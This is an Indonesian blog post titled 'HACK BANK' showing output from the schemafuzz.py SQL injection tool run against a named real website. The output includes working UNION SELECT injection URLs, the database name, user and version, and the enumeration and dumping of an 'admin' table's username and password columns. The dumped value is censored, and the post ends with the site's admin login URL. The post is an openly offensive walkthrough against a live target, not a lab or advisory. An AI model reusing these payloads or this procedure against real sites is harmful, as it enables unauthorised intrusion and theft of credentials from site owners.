Selasa, 18 Oktober 2011

HACK BANK

Code:
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17--
[+] Evasion Used: "+" "--"
[+] 21:25:25
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,
[+] Column Length is: 5
[+] Found null column at column #: 1
[+] SQLi URL: http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,1,2,3,4--
[+] darkc0de URL: http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4
[-] Done!

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4--
[+] Evasion Used: "+" "--"
[+] 21:26:39
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: k9bloodbank_com
User: hmziller@localhost
Version: 4.0.27-log
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4--
[+] Evasion Used: "+" "--"
[+] 21:27:12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: k9bloodbank_com
User: hmziller@localhost
Version: 4.0.27-log
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...

[+] Found a table called: admin

[+] Now searching for columns inside table "admin"
[!] Found a column called:username
[!] Found a column called:password
[!] Found a column called:id
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4--
[+] Evasion Used: "+" "--"
[+] 21:29:03
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: k9bloodbank_com
User: hmziller@localhost
Version: 4.0.27-log
[+] Dumping data from database "k9bloodbank_com" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] -=[CENCORED BY ME....!!!!!!]=-

[-] [21:29:15]
[-] Total URL Requests 3
[-] Done


loginnya di
Code:
http://www.k9bloodbank.com/admin
SORRY ADA YG ANE RALAT ( SEMBUNYIKAN KARENA INI MERUGIKAN ORANG LAIN )

0 komentar:

Posting Komentar